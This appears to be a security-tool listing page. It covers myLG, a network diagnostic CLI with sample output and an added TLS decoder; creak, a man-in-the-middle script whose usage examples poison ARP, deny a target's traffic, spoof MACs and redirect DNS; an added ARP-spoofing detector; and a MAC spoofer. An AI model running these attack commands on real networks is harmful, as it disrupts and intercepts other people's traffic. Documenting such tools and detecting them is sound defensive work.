
myLG - Network Diagnostic Tool


myLG is an open source software utility which combines the functions of the different network probes in one network diagnostic tool.

Features
  • Popular looking glasses (ping/trace/bgp): Telia, Level3
  • DNS lookup information for more than 200 countries
  • Local ping and real-time trace route
  • Packet analyzer - TCP/IP and other packets
  • Quick NMS (network management system)
  • Local HTTP/HTTPS ping (GET, POST, HEAD)
  • RIPE information (ASN, IP/CIDR)
  • PeeringDB information
  • Port scanning
  • Network LAN Discovery
  • Web dashboard
  • Configurable options
  • Direct access to commands from shell
  • Supports vi and emacs modes (almost all basic features)
  • CLI auto complete and history features

Demo

Screenshots

Usage
=================================================   
_ ___
_ __ _ _| | / __|
| ' \ || | |_| (_ |
|_|_|_\_, |____\___|
|__/

My Looking Glass
Free Network Diagnostic Tool
www.facebook.com/mylg.io
http://mylg.io
================== myLG v0.2.5 ==================

local> hping https://www.google.com -trace -c 4
HPING www.google.com (216.58.194.196), Method: HEAD, DNSLookup: 17.2923 ms
HTTP Response seq=0, proto=HTTP/1.1, status=200, time=183.097 ms, connection=34.789 ms, first byte read=148.167 ms
HTTP Response seq=1, proto=HTTP/1.1, status=200, time=164.960 ms, connection=27.764 ms, first byte read=137.096 ms
HTTP Response seq=2, proto=HTTP/1.1, status=200, time=153.559 ms, connection=27.881 ms, first byte read=125.526 ms
HTTP Response seq=3, proto=HTTP/1.1, status=200, time=164.309 ms, connection=28.904 ms, first byte read=135.296 ms

--- www.google.com HTTP ping statistics ---
4 requests transmitted, 4 replies received, 0% requests failed
HTTP Round-trip min/avg/max = 153.56/164.05/183.10 ms
HTTP Code [200] responses : [████████████████████] 100.00%

local> whois 577
BACOM - Bell Canada, CA
+--------------------+-----------+
| LOCATION | COVERED % |
+--------------------+-----------+
| Canada - ON | 61.3703 |
| Canada | 36.2616 |
| Canada - QC | 1.3461 |
| United States - MA | 0.7160 |
| Canada - BC | 0.1766 |
| Canada - AB | 0.0811 |
| United States | 0.0195 |
| United States - NJ | 0.0143 |
| Belgium | 0.0048 |
| United States - NC | 0.0048 |
| United States - TX | 0.0048 |
| Canada - NB | 0.0000 |
| Canada - NS | 0.0000 |
+--------------------+-----------+

local> scan www.google.com -p 1-500
+----------+------+--------+-------------+
| PROTOCOL | PORT | STATUS | DESCRIPTION |
+----------+------+--------+-------------+
| TCP | 80 | Open | |
| TCP | 443 | Open | |
+----------+------+--------+-------------+
Scan done: 2 opened port(s) found in 5.605 seconds

lg/telia/los angeles> bgp 8.8.8.0/24
Telia Carrier Looking Glass - show route protocol bgp 8.8.8.0/24 table inet.0

Router: Los Angeles

Command: show route protocol bgp 8.8.8.0/24 table inet.0

inet.0: 661498 destinations, 5564401 routes (657234 active, 509 holddown, 194799 hidden)
+ = Active Route, - = Last Active, * = Both

8.8.8.0/24 *[BGP/170] 33w0d 01:36:06, MED 0, localpref 200
AS path: 15169 I, validation-state: unverified
> to 62.115.36.170 via ae4.0
[BGP/170] 8w3d 11:19:40, MED 0, localpref 200, from 80.91.255.95
AS path: 15169 I, validation-state: unverified
to 62.115.119.84 via xe-1/1/0.0
to 62.115.119.88 via xe-1/2/0.0
to 62.115.119.90 via xe-11/0/3.0
to 62.115.119.102 via xe-9/0/0.0
to 62.115.119.92 via xe-9/0/2.0
> to 62.115.119.86 via xe-9/1/2.0
to 62.115.119.98 via xe-9/2/2.0
to 62.115.119.100 via xe-9/2/3.0
to 62.115.119.94 via xe-9/3/1.0
to 62.115.119.96 via xe-9/3/3.0

ns/united states/redwood city> dig yahoo.com
Trying to query server: 204.152.184.76 united states redwood city
;; opcode: QUERY, status: NOERROR, id: 19850
;; flags: qr rd ra;
yahoo.com. 728 IN MX 1 mta6.am0.yahoodns.net.
yahoo.com. 728 IN MX 1 mta5.am0.yahoodns.net.
yahoo.com. 728 IN MX 1 mta7.am0.yahoodns.net.
yahoo.com. 143013 IN NS ns4.yahoo.com.
yahoo.com. 143013 IN NS ns6.yahoo.com.
yahoo.com. 143013 IN NS ns2.yahoo.com.
yahoo.com. 143013 IN NS ns5.yahoo.com.
yahoo.com. 143013 IN NS ns1.yahoo.com.
yahoo.com. 143013 IN NS ns3.yahoo.com.

;; ADDITIONAL SECTION:
ns1.yahoo.com. 561456 IN A 68.180.131.16
ns2.yahoo.com. 27934 IN A 68.142.255.16
ns3.yahoo.com. 532599 IN A 203.84.221.53
ns4.yahoo.com. 532599 IN A 98.138.11.157
ns5.yahoo.com. 532599 IN A 119.160.247.124
ns6.yahoo.com. 143291 IN A 121.101.144.139
ns1.yahoo.com. 51624 IN AAAA 2001:4998:130::1001
ns2.yahoo.com. 51624 IN AAAA 2001:4998:140::1002
ns3.yahoo.com. 51624 IN AAAA 2406:8600:b8:fe03::1003
ns6.yahoo.com. 143291 IN AAAA 2406:2000:108:4::1006
;; Query time: 1204 ms

;; CHAOS CLASS BIND
version.bind. 0 CH TXT "9.10.4-P1"
hostname.bind. 0 CH TXT "fred.isc.org"

local> peering 6327
The data provided from www.peeringdb.com
+-------------------+---------------+---------------+--------------------+------+
| NAME | TRAFFIC | TYPE | WEB SITE | NOTE |
+-------------------+---------------+---------------+--------------------+------+
| Shaw Cablesystems | 500-1000 Gbps | Cable/DSL/ISP | http://www.shaw.ca | |
+-------------------+---------------+---------------+--------------------+------+
+------------------+--------+--------+-----------------+-------------------------+
| NAME | STATUS | SPEED | IPV4 ADDR | IPV6 ADDR |
+------------------+--------+--------+-----------------+-------------------------+
| Equinix Ashburn | ok | 20000 | 206.126.236.20 | 2001:504:0:2::6327:1 |
| Equinix Ashburn | ok | 20000 | 206.223.115.20 | |
| Equinix Chicago | ok | 30000 | 206.223.119.20 | 2001:504:0:4::6327:1 |
| Equinix San Jose | ok | 30000 | 206.223.116.20 | 2001:504:0:1::6327:1 |
| Equinix Seattle | ok | 20000 | 198.32.134.4 | 2001:504:12::4 |
| Equinix New York | ok | 10000 | 198.32.118.16 | 2001:504:f::10 |
| SIX Seattle | ok | 100000 | 206.81.80.54 | 2001:504:16::18b7 |
| NYIIX | ok | 20000 | 198.32.160.86 | 2001:504:1::a500:6327:1 |
| TorIX | ok | 10000 | 206.108.34.12 | |
| PIX Vancouver | ok | 10000 | 206.223.127.2 | |
| PIX Toronto | ok | 1000 | 206.223.127.132 | |
| Equinix Toronto | ok | 10000 | 198.32.181.50 | 2001:504:d:80::6327:1 |
+------------------+--------+--------+-----------------+-------------------------+

local> disc
Network LAN Discovery
+--------------+-------------------+------+-----------+-------------------+
| IP | MAC | HOST | INTERFACE | ORGANIZATION NAME |
+--------------+-------------------+------+-----------+-------------------+
| 172.16.0.0 | ff:ff:ff:ff:ff:ff | NA | en0 | NA |
| 172.16.1.1 | e4:8d:8c:7a:66:26 | NA | en0 | Routerboard.com |
| 172.16.1.10 | ac:bc:32:b4:33:23 | NA | en0 | Apple, Inc. |
| 172.16.1.205 | 74:e5:b:97:11:28 | NA | en0 | NA |
| 172.16.1.254 | 54:4a:0:33:b4:2f | NA | en0 | NA |
| 172.16.2.12 | d4:f4:6f:7b:8f:cf | NA | en0 | Apple, Inc. |
| 172.16.2.13 | 5c:ad:cf:23:7:f9 | NA | en0 | Apple, Inc. |
| 172.16.2.111 | d0:a6:37:72:cf:2d | NA | en0 | Apple, Inc. |
| 192.168.33.0 | ff:ff:ff:ff:ff:ff | NA | vboxnet0 | NA |
| 192.168.33.1 | a:0:27:0:0:0 | NA | vboxnet0 | NA |
| 224.0.0.251 | 1:0:5e:0:0:fb | NA | en0 | NA |
+--------------+-------------------+------+-----------+-------------------+
11 host(s) has been found

local> whois 8.8.8.8
+------------+-------+--------------------------+
| PREFIX | ASN | HOLDER |
+------------+-------+--------------------------+
| 8.8.8.0/24 | 15169 | GOOGLE - Google Inc., US |
+------------+-------+--------------------------+

local> dump -d
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+
| NAME | MAC | STATUS | MTU | IP ADDRESSES | MULTICAST | BROADCAST | POINTTOPOINT | LOOPBACK |
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+
| lo0 | | UP | 16384 | 127.0.0.1/8 ::1/128 fe80::1/64 | ✓ | | | ✓ |
| gif0 | | DOWN | 1280 | | ✓ | | ✓ | |
| stf0 | | DOWN | 1280 | | | | | |
| en0 | ac:bc:32:b4:33:23 | UP | 1500 | fe80::181b:3d55:e9a2:e3df/64 | ✓ | ✓ | | |
| | | | | 192.168.0.103/24 | | | | |
| p2p0 | 0e:bc:32:b4:33:23 | UP | 2304 | | ✓ | ✓ | | |
| awdl0 | ee:3a:98:da:44:5c | UP | 1484 | fe80::ec3a:98ff:feda:445c/64 | ✓ | ✓ | | |
| en1 | 4a:00:03:9c:8d:60 | UP | 1500 | | | ✓ | | |
| en2 | 4a:00:03:9c:8d:61 | UP | 1500 | | | ✓ | | |
| bridge0 | 4a:00:03:9c:8d:60 | UP | 1500 | | ✓ | ✓ | | |
| utun0 | | UP | 2000 | fe80::ec23:f621:ae74:5271/64 | ✓ | | ✓ | |
| utun1 | | UP | 1380 | fe80::d187:7734:49d9:9d84/64 | ✓ | | ✓ | |
| vboxnet0 | 0a:00:27:00:00:00 | DOWN | 1500 | | ✓ | ✓ | | |
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+

local> dump
20:29:36.415 IPv4/TCP ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61479 [P.], win 166, len: 33
20:29:36.416 IPv4/TCP 192.168.0.104:61479 > ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) [.], win 4094, len: 0
20:29:36.417 IPv4/TCP 192.168.0.104:61479 > ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 37
20:29:36.977 IPv4/UDP 192.168.0.104:62733 > 192.168.0.1:53(domain) , len: 0
20:29:37.537 IPv4/TCP ec2-54-86-120-119.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61302 [.], win 124, len: 0
20:29:38.125 IPv4/TCP 192.168.0.104:61304 > ec2-52-23-213-161.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 85
20:29:38.126 IPv4/TCP ec2-52-23-213-161.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61304 [.], win 1048, len: 0
20:29:38.760 IPv4/TCP ec2-54-165-12-100.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61296 [.], win 2085, len: 0
20:29:39.263 IPv4/ICMP 192.168.0.104 > ir1.fp.vip.ne1.yahoo.com.: EchoRequest id 20859, seq 27196, len: 56
20:29:39.265 IPv4/UDP 192.168.0.1:53(domain) > 192.168.0.104:62733 , len: 0

local> dump tcp and port 443 -c 10
23:26:56.026 IPv4/TCP 192.168.0.104:64686 > 192.0.80.242:443(https) [F.], win 8192, len: 0
23:26:56.045 IPv4/TCP 192.168.0.104:64695 > i2.wp.com.:443(https) [F.], win 8192, len: 0
23:26:56.048 IPv4/TCP i2.wp.com.:443(https) > 192.168.0.104:64695 [F.], win 62, len: 0
23:26:56.081 IPv4/TCP 192.168.0.104:63692 > ec2-54-88-144-213.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 37
23:26:56.082 IPv4/TCP 192.168.0.104:64695 > i2.wp.com.:443(https) [.], win 8192, len: 0
23:26:56.083 IPv4/TCP 192.0.80.242:443(https) > 192.168.0.104:64686 [.], win 64, len: 0
23:26:56.150 IPv4/TCP ec2-54-88-144-213.compute-1.amazonaws.com.:443(https) > 192.168.0.104:63692 [.], win 166, len: 0
23:26:56.259 IPv4/TCP ec2-54-172-56-148.compute-1.amazonaws.com.:443(https) > 192.168.0.104:63623 [P.], win 1316, len: 85
23:26:56.260 IPv4/TCP 192.168.0.104:63623 > ec2-54-172-56-148.compute-1.amazonaws.com.:443(https) [.], win 4093, len: 0
23:26:56.820 IPv4/TCP 192.168.0.104:64691 > 192.30.253.116:443(https) [.], win 4096, len: 0

local> dump -s http -x
22:10:15.770 IPv4/TCP 151.101.44.143:443(https) > 10.0.9.9:50771 [P.], win 59, len: 156
00000000 16 03 03 00 64 02 00 00 60 03 03 a2 32 19 4b 78 |....d...`...2.Kx|
00000010 77 ed 40 75 f6 4c 55 74 43 1d b7 6c f2 59 f8 d8 |w.@u.LUtC..l.Y..|
00000020 09 8a 3e 03 62 56 38 45 d2 bc 02 20 bd 52 8a 42 |..>.bV8E... .R.B|
00000030 5b 01 33 7d 2b 0b 41 da eb 38 87 79 f1 37 62 5c |[.3}+.A..8.y.7b\|
00000040 f3 ed 5a 7c 07 6c e9 28 9b fe fa 76 c0 2f 00 00 |..Z|.l.(...v./..|
00000050 18 ff 01 00 01 00 00 05 00 00 00 10 00 0b 00 09 |................|
00000060 08 68 74 74 70 2f 31 2e 31 14 03 03 00 01 01 16 |.http/1.1.......|
00000070 03 03 00 28 fc 20 2d 6f 1a 94 78 53 55 0f 8c 05 |...(. -o..xSU...|
00000080 3e ae 12 34 79 af d2 a9 bd 22 e5 3f b1 2b f5 36 |>..4y....".?.+.6|
00000090 ba 51 31 37 f5 0b e6 d2 40 fb 88 a5 |.Q17....@... |
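The `-x` dump above is worth reading byte by byte: although the filter was `-s http`, the payload on port 443 starts with `16 03 03`, a TLS handshake record, followed by a ChangeCipherSpec and an encrypted Finished. The decoder below is an added example written for this page; it is not part of myLG. It reassembles the hex dump into bytes (checking that the offsets are contiguous), walks the TLS record layer, and parses the ServerHello to report which cipher suite and ALPN protocol the server selected. The hex dump is the one printed above, embedded as the constructed input; the record-layer and ServerHello layouts follow RFC 5246.

```python
from typing import Dict, List, Tuple

# Constructed input: the hex dump printed by `dump -s http -x` above, copied as-is.
HEXDUMP = r"""
00000000 16 03 03 00 64 02 00 00 60 03 03 a2 32 19 4b 78 |....d...`...2.Kx|
00000010 77 ed 40 75 f6 4c 55 74 43 1d b7 6c f2 59 f8 d8 |w.@u.LUtC..l.Y..|
00000020 09 8a 3e 03 62 56 38 45 d2 bc 02 20 bd 52 8a 42 |..>.bV8E... .R.B|
00000030 5b 01 33 7d 2b 0b 41 da eb 38 87 79 f1 37 62 5c |[.3}+.A..8.y.7b\|
00000040 f3 ed 5a 7c 07 6c e9 28 9b fe fa 76 c0 2f 00 00 |..Z|.l.(...v./..|
00000050 18 ff 01 00 01 00 00 05 00 00 00 10 00 0b 00 09 |................|
00000060 08 68 74 74 70 2f 31 2e 31 14 03 03 00 01 01 16 |.http/1.1.......|
00000070 03 03 00 28 fc 20 2d 6f 1a 94 78 53 55 0f 8c 05 |...(. -o..xSU...|
00000080 3e ae 12 34 79 af d2 a9 bd 22 e5 3f b1 2b f5 36 |>..4y....".?.+.6|
00000090 ba 51 31 37 f5 0b e6 d2 40 fb 88 a5 |.Q17....@... |
"""

TLS_CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake", 23: "application_data"}
ALPN_EXTENSION = 16  # IANA extension type: application_layer_protocol_negotiation


def load_hexdump(text: str) -> bytes:
    """Rebuild the payload from `offset xx xx ... |ascii|` lines, checking offsets are contiguous."""
    buf = bytearray()
    for line in text.strip().splitlines():
        fields = line.split("|", 1)[0].split()  # drop the ASCII column
        offset, hexbytes = int(fields[0], 16), fields[1:]
        if offset != len(buf):
            raise ValueError(f"gap in dump at offset {offset:#x}")
        buf += bytes.fromhex("".join(hexbytes))
    return bytes(buf)


def tls_records(buf: bytes) -> List[Tuple[str, Tuple[int, int], bytes]]:
    """Split a TCP payload into TLS records: 1-byte type, 2-byte version, 2-byte length, body."""
    records, pos = [], 0
    while pos < len(buf):
        if pos + 5 > len(buf):
            raise ValueError("truncated TLS record header")
        ctype, version = buf[pos], (buf[pos + 1], buf[pos + 2])
        length = int.from_bytes(buf[pos + 3:pos + 5], "big")
        body = buf[pos + 5:pos + 5 + length]
        if len(body) != length:
            raise ValueError("truncated TLS record body")
        records.append((TLS_CONTENT_TYPES.get(ctype, f"unknown({ctype})"), version, body))
        pos += 5 + length
    return records


def parse_server_hello(body: bytes) -> Dict:
    """Parse a ServerHello handshake message (RFC 5246 layout) to see what the server chose."""
    if body[0] != 2:  # HandshakeType server_hello
        raise ValueError("not a ServerHello")
    if int.from_bytes(body[1:4], "big") + 4 != len(body):
        raise ValueError("handshake length does not match record")
    p = 4
    version = (body[p], body[p + 1]); p += 2
    p += 32                                   # server random
    p += 1 + body[p]                          # session_id<0..32>
    cipher_suite = int.from_bytes(body[p:p + 2], "big"); p += 2
    p += 1                                    # compression method
    ext_len = int.from_bytes(body[p:p + 2], "big"); p += 2
    end = p + ext_len
    extensions, alpn = [], None
    while p < end:
        etype = int.from_bytes(body[p:p + 2], "big")
        elen = int.from_bytes(body[p + 2:p + 4], "big")
        edata = body[p + 4:p + 4 + elen]
        extensions.append(etype)
        if etype == ALPN_EXTENSION:           # ProtocolNameList: 2-byte list length, then (1-byte len, name)*
            q, names = 2, []
            while q < len(edata):
                n = edata[q]
                names.append(edata[q + 1:q + 1 + n].decode("ascii"))
                q += 1 + n
            alpn = names
        p += 4 + elen
    return {"version": version, "cipher_suite": cipher_suite, "extensions": extensions, "alpn": alpn}


def summarize(text: str) -> Dict:
    """Decode a dump and report byte count, record sequence and the ServerHello choices."""
    buf = load_hexdump(text)
    recs = tls_records(buf)
    hello = parse_server_hello(recs[0][2]) if recs and recs[0][0] == "handshake" else None
    return {"bytes": len(buf), "records": [(t, len(b)) for t, _, b in recs], "server_hello": hello}


if __name__ == "__main__":
    print(summarize(HEXDUMP))
```

On this capture the decoder reports three records (a 100-byte handshake, a 1-byte ChangeCipherSpec and a 40-byte encrypted handshake), cipher suite 0xC02F (TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256) and ALPN `http/1.1`, which is the kind of fact a packet-level tool like `dump -x` lets you confirm without a full decoder.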

local> dump !udp -w /home/user1/mypcap -c 100000

local> ping google.com -6
PING google.com (2607:f8b0:400b:80a::200e): 56 data bytes
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=0 time=23.193988 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=1 time=21.265492 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=2 time=24.521306 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=3 time=25.313072 ms

local> trace google.com
trace route to google.com (172.217.4.142), 30 hops max
1 192.168.0.1 4.705 ms 1.236 ms 0.941 ms
2 142.254.236.25 [ASN 20001/ROADRUNNER-WEST] 13.941 ms 13.504 ms 12.303 ms
3 agg59.snmncaby01h.socal.rr.com. (76.167.31.241) [ASN 20001/ROADRUNNER-WEST] 14.834 ms 11.625 ms 13.050 ms
4 agg20.lamrcadq01r.socal.rr.com. (72.129.10.128) [ASN 20001/ROADRUNNER-WEST] 17.617 ms 18.064 ms 15.612 ms
5 agg28.lsancarc01r.socal.rr.com. (72.129.9.0) [ASN 20001/ROADRUNNER-WEST] 16.291 ms 24.079 ms 20.456 ms
6 bu-ether26.lsancarc0yw-bcr00.tbone.rr.com. (66.109.3.230) [ASN 7843/TWCABLE-BACKBONE] 18.339 ms 23.278 ms 23.434 ms
7 216.0.6.25 [ASN 2828/XO-AS15] 19.842 ms 21.025 ms 35.105 ms
8 216.0.6.42 [ASN 2828/XO-AS15] 16.666 ms 18.252 ms 18.872 ms
9 209.85.245.199 [ASN 15169/GOOGLE] 14.358 ms 17.478 ms
209.85.246.125 [ASN 15169/GOOGLE] 18.593 ms
10 72.14.239.121 [ASN 15169/GOOGLE] 21.635 ms
72.14.238.213 [ASN 15169/GOOGLE] 16.133 ms
72.14.239.121 [ASN 15169/GOOGLE] 21.541 ms
11 lax17s14-in-f14.1e100.net. (172.217.4.142) [ASN 15169/GOOGLE] 18.127 ms 17.151 ms 18.892 ms

local> show config
set ping timeout 2s
set ping interval 1s
set ping count 4
set hping timeout 2s
set hping method HEAD
set hping data mylg
set hping count 5
set web port 8080
set web address 127.0.0.1
set scan port 1-500

local> set hping count 10

sh-3.2# mylg peering 577
The data provided from www.peeringdb.com
+----------------------+---------+------+--------------------+------+
| NAME | TRAFFIC | TYPE | WEB SITE | NOTE |
+----------------------+---------+------+--------------------+------+
| Bell Canada Backbone | | NSP | http://www.bell.ca | |
+----------------------+---------+------+--------------------+------+
+-------------------+--------+-------+-----------------+------------------------+
| NAME | STATUS | SPEED | IPV4 ADDR | IPV6 ADDR |
+-------------------+--------+-------+-----------------+------------------------+
| Equinix Ashburn | ok | 20000 | 206.126.236.203 | 2001:504:0:2::577:1 |
| Equinix Chicago | ok | 20000 | 206.223.119.66 | 2001:504:0:4::577:1 |
| Equinix Palo Alto | ok | 10000 | 198.32.176.94 | 2001:504:d::5e |
| Equinix New York | ok | 10000 | 198.32.118.113 | 2001:504:f::577:1 |
| SIX Seattle | ok | 10000 | 206.81.80.217 | 2001:504:16::241 |
| NYIIX | ok | 10000 | 198.32.160.36 | 2001:504:1::a500:577:1 |
+-------------------+--------+-------+-----------------+------------------------+

local> nms
nms> connect core1-sjc
Connected: Juniper Networks, Inc. qfx10008 Ethernet Switch, kernel JUNOS 15.1X53 ...
nms/core1-sjc> show interface xe-.*
15 interfaces has been found
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
| INTERFACE | STATUS | DESCRIPTION | TRAFFIC IN | TRAFFIC OUT | PACKETS IN | PACKETS OUT | DISCARD IN | DISCARD OUT | ERROR IN | ERROR OUT |
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
| xe-7/0/0:1 | Up | RSW011-01-SJC-002 | 192.58 K | 75.72 K | 64.60 | 56.60 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-7/0/0:2 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-7/0/0:3 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-7/0/0:0 | Up | RSW012-01-SJC-001 | 61.40 K | 10.04 K | 8.60 | 5.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/0:0 | Down | CORE1-SAN-XE-2/2/0-AGGIPER40GLR | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/0:1 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/0:2 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/0:3 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/1:0 | Up | CORE1-SAN-XE-10/3/1-10GTEK | 11.79 M | 1.39 M | 1.82 K | 1.02 K | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/1:1 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/1:2 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/1:3 | Down | | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/2:0 | Up | CORE2-SJC-XE-1/2/0-AGG59 | 5.25 K | 409.60 | 0.20 | 0.01 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/2:1 | Up | CORE3-SJC-XE-1/3/0-AGG31 | 5.44 K | 0.00 | 0.31 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| xe-6/0/3:0 | Down | CORE3-SJC-XE-1/0/0-40GTEK | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
* units per seconds

Build
It can be built for Linux and Darwin; libpcap is a dependency:
- LINUX
apt-get install libpcap-dev
- OSX
brew install homebrew/dupes/libpcap
With the Go compiler installed (version 1.7 or greater is required), you can build and run it with:
git clone https://github.com/mehrdadrad/mylg.git
cd mylg
go get
go build mylg



creak - Poison, Reset, Spoof, Redirect MITM Script


Performs some of the most famous MITM attacks on target addresses located in a local network. Among these, it denies the navigation and download capabilities of a target host in the local network by performing an ARP poison attack and sending TCP reset packets for every request made to the router. Born as a didactic project for learning the Python language, I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
or simply clone the repository and run creak.py once all requirements are installed:
$ git clone https://github.com/codepr/creak.git
It requires the pcap libraries for raw packet manipulation and the dpkt module; the DNS spoofing options also require the dnet module from the libdnet package (do not confuse it with the pydnet network evaluation tool). It can also use scapy if desired; this is set in the config.py file.

Options
Usage: creak.py [options] dev

Options:
-h, --help            show this help message and exit
-1, --sessions-scan   Sessions scan mode
-2, --dns-spoof       Dns spoofing
-3, --session-hijack  Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof           Spoof mode, generate a fake MAC address to be used during attack
-m MACADDR            Mac address octet prefix (could be an entire MAC address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER       Manufacturer of the wireless device, for retrieving a manufactur based prefix for MAC spoof
-s SOURCE             Source ip address (e.g. a class C address like 192.168.1.150) usually the router address
-t TARGET             Target ip address (e.g. a class C address like 192.168.1.150), can be specified multiple times
-p PORT               Target port to shutdown
-a HOST               Target host that will be redirect while navigating on target machine
-r REDIR              Target redirection that will be fetched instead of host on the target machine
-v, --verbose         Verbose output mode
-d, --dotted          Dotted output mode

Example
Most basic usage: Deny all traffic to the target host
$ python creak.py -t 192.168.1.30 wlan0
Set a different gateway:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Set a different mac address for the device:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Spoof mac address generating a fake one:
$ python creak.py -x -t 192.168.1.30 wlan0
Spoof mac address generating one based on manufacturer (e.g. Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz (e.g. localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Deny multiple hosts in the subnet:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
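From the defender's side, the ARP poisoning that creak performs leaves a simple trace on the segment: an IP address whose hardware address changes in ARP replies, and one MAC that suddenly answers for both the gateway and a host. The detector below is an added example written for this page, not part of creak; it consumes a list of observed ARP replies (a constructed sample, not a real capture) and raises an alert on a changed binding, with higher severity when the changed IP is the configured gateway, and on a MAC that claims more than one IP. The `gateway_ip` parameter and the severity labels are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ArpReply:
    ts: float         # seconds since capture start
    sender_ip: str    # "sender protocol address" field of the ARP reply
    sender_mac: str   # "sender hardware address" field of the ARP reply


# Constructed observations on one LAN segment (not a real capture).
OBSERVED = [
    ArpReply(0.0, "192.168.1.1", "e4:8d:8c:7a:66:26"),   # gateway answers with its real address
    ArpReply(1.0, "192.168.1.30", "ac:bc:32:b4:33:23"),  # a workstation
    ArpReply(2.0, "192.168.1.1", "02:11:22:33:44:55"),   # gateway IP now bound to a different MAC
    ArpReply(2.5, "192.168.1.30", "02:11:22:33:44:55"),  # the same MAC also claims the workstation
    ArpReply(3.0, "192.168.1.1", "02:11:22:33:44:55"),   # repeat of the new binding: no new alert
]


def is_locally_administered(mac: str) -> bool:
    """U/L bit (bit 1 of the first octet) set: the address was assigned by software, not the vendor."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def detect_arp_spoofing(replies: List[ArpReply], gateway_ip: Optional[str] = None) -> List[Dict]:
    """Track IP->MAC bindings seen in ARP replies and flag changes and multi-IP MACs."""
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = {}
    alerts: List[Dict] = []
    for r in replies:
        mac = r.sender_mac.lower()
        prev = ip_to_mac.get(r.sender_ip)
        if prev is not None and prev != mac:
            alerts.append({
                "at": r.ts, "kind": "binding_changed", "ip": r.sender_ip, "old": prev, "new": mac,
                "severity": "high" if r.sender_ip == gateway_ip else "medium",
                "locally_administered": is_locally_administered(mac),
            })
        ip_to_mac[r.sender_ip] = mac
        ips = mac_to_ips.setdefault(mac, set())
        if r.sender_ip not in ips:
            ips.add(r.sender_ip)
            if len(ips) > 1:  # one NIC answering for several hosts is the poisoning signature
                alerts.append({"at": r.ts, "kind": "mac_claims_multiple_ips", "mac": mac,
                               "ips": sorted(ips), "severity": "high"})
    return alerts


if __name__ == "__main__":
    for a in detect_arp_spoofing(OBSERVED, gateway_ip="192.168.1.1"):
        print(a)
```

A router that legitimately owns several addresses will trip the multi-IP rule, so in practice the gateway's real MAC is whitelisted; static ARP entries for the gateway on sensitive hosts and dynamic ARP inspection on managed switches remove the problem rather than just detecting it.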


WinMACSpoofer - Windows Tool For Spoofing The Mac Address


Windows application for spoofing the MAC address and host name.

Usage
The program must be run in "administrator mode" for the functions to work properly.
  1. Set a new Random MAC address
    • Press the randomize button to generate a random MAC address
    • Click the random radio button and hit "Set New Mac" to reset your MAC address to this new address
  2. Set the MAC address manually
    • To use a specially selected MAC address enter the desired values in the text fields
    • CAUTION The second nibble can only be set with a value of ('A', 'E', '2' or '6')
    • e.g. xy-xx-xx-xx-xx-xx, y represents the second nibble and must be represented by ('A', 'E', '2' or '6')
    • x can be represented by any hexadecimal value
  3. Reset the MAC address
    • To revert the MAC address back to the network adapter's original values press the "reset" button
  4. Change Host Name
    • Enter the desired host name and press "Change Host Name"
